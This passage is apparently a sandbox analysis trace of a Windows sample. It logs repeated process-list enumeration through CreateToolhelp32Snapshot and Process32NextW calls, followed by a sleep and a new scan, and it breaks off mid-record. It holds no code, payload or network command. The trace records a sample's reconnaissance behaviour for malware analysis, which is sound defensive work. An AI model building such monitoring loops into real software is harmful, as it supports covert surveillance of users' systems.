lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.177] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.181] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.183] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.184] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.185] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.186] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.231] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.232] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.233] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.234] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.235] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.236] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.237] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.238] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.239] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.241] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.242] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.243] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.244] CloseHandle (hObject=0xc4) returned 1 [0106.244] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0106.249] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.251] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.252] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.252] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.260] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.261] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.262] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.315] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.326] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.327] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.328] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.329] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.330] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.331] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.332] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.333] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.334] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.335] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.336] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.337] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0106.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0106.339] CloseHandle (hObject=0xbc) returned 1 [0106.339] Sleep (dwMilliseconds=0x12c) [0106.651] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0106.681] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.682] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.683] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.684] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.685] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.686] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, 